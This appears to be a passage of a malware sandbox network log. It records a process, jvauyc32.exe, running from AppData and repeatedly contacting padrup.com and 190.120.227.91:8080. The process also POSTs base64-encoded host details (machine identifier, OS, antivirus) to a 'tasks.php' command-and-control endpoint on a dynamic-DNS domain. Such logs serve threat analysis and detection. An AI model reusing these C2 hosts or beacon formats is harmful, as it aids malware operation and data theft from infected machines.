                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244339943 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:40 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tF7/acnrmDT6dnSp8yHA9IkwdQ16MbdObvIKMk5stfOQgvZpzBfCr10S+P/ii3uAUkQNqKTKK85B6cPdRyO4eg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244394064 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI3OS44Nzg0OmI0ZTgwMWM4MGFhZjJjMjE1OWI4YjVkNmJlODE3MTFlNWZhZDZkM2YyMmI3ZjM5MjhjM2JmNjJkNTQ6ee5NWNjYzM6NjcxMjNjMTdkNjc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244427919 CEST424INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244462967 CEST340INData Raw: 30 38 62 33 63 37 34 30 66 64 61 64 39 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                                                                          Data Ascii: 08b3c740fdad9d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          63192.168.2.950045190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.549698114 CEST169OUTGET /sobakavolos.gif?2a895223=713642531 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          64192.168.2.950046185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.237698078 CEST157OUTGET /sobaka1.gif?2b0ab4f0=-684357456 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270262003 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:47 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PTOxAN3e+SCt8pWrIOcgQs8TjOb0NYC/Ej/lt3VUXfPl5AoA2Ah9VjAX/dibQ6BJd7V7ehmrSBKFn5KcotCmvQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270283937 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI4Ni45MTg4OjdkY2NhNTY1NmM4NDIwNzE5OGRhMGNjMjM4MDFhMmJhYWM3MjY5MDdmMmIwMDcyOWNhNjMwMDRjZDlhNDRjNzk6NjcxMjNjMWVlMDUzNg==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270302057 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.270313025 CEST333INData Raw: 37 31 37 30 30 63 66 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                                          Data Ascii: 71700cf');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href = "


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          65192.168.2.950047194.5.152.215807352C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.885612011 CEST453OUTPOST /n/tasks.php HTTP/1.0
                                                                                                                                                                                                                                                                                          Host: n.ddnsgratis.com.br
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
                                                                                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                          Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
                                                                                                                                                                                                                                                                                          Content-length: 192
                                                                                                                                                                                                                                                                                          Data Raw: 5f 77 76 3d 59 32 31 6b 4a 6a 6c 6c 4d 54 51 32 59 6d 55 35 4c 57 4d 33 4e 6d 45 74 4e 44 63 79 4d 43 31 69 59 32 52 69 4c 54 55 7a 4d 44 45 78 59 6a 67 33 59 6d 51 77 4e 69 5a 6b 52 32 78 31 57 56 4e 42 4e 6b 6c 47 55 6b 70 55 61 30 56 30 56 55 56 4e 5a 30 39 70 51 54 52 4f 65 6d 63 77 54 56 52 46 4a 54 4e 45 4a 6c 64 70 62 6d 52 76 64 33 4d 6c 4d 6a 41 78 4d 43 55 79 4d 43 67 32 4e 43 31 69 61 58 51 70 4a 6a 45 6d 56 32 6c 75 5a 47 39 33 63 79 55 79 4d 45 52 6c 5a 6d 56 75 5a 47 56 79 4a 6a 55 75 4d 53 59 78 4f 43 34 78 4d 43 34 79 4d 44 49 30 4a 6b 35 50 54 6b 55 3d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.925184011 CEST606INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:47 GMT
                                                                                                                                                                                                                                                                                          Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
                                                                                                                                                                                                                                                                                          X-Powered-By: PHP/5.6.14
                                                                                                                                                                                                                                                                                          Status: 404 Not Found
                                                                                                                                                                                                                                                                                          Content-Length: 377
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf8
                                                                                                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 [TRUNCATED]
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          66192.168.2.950048190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:47.521785975 CEST169OUTGET /sobakavolos.gif?2b436842=725837890 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          67192.168.2.950049185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.174532890 CEST158OUTGET /sobaka1.gif?2bc60f28=-2091766408 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223341942 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:53 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_n886BxQLr0Ra5VmrnsI6bCocEzqgSER+Fo8chgYLVve1F8jWMPjJtQW05T0oI6c7+2ZBIxa8wHyuaBtZv2HTkA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 66 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1f7<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223366976 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI5Mi44NjkxOjgxMGEwOTdkZmRiYmEyN2FkYTcwMDVlZDEyNGFlM2RhNWViNGFhOTRlYzc4NGE2MmU2NTFlNGEyMzEzZTQ0YTg6Njc6e2xMjNjMjRkNDJ
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.223381996 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          68192.168.2.950050190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.642582893 CEST171OUTGET /sobakavolos.gif?2be56550=-1225394912 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          69192.168.2.950051185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.051703930 CEST158OUTGET /sobaka1.gif?2e00e35c=-1979536876 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:59.153179884 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:59 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hkX6cyZ07LUo7LuFH+m3gh18P8rUGXFdbGkK4INWX8QDIy50Hil0yKoPRf2Yga5vcMJmP7BIMdkbDbDPfTDGmg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
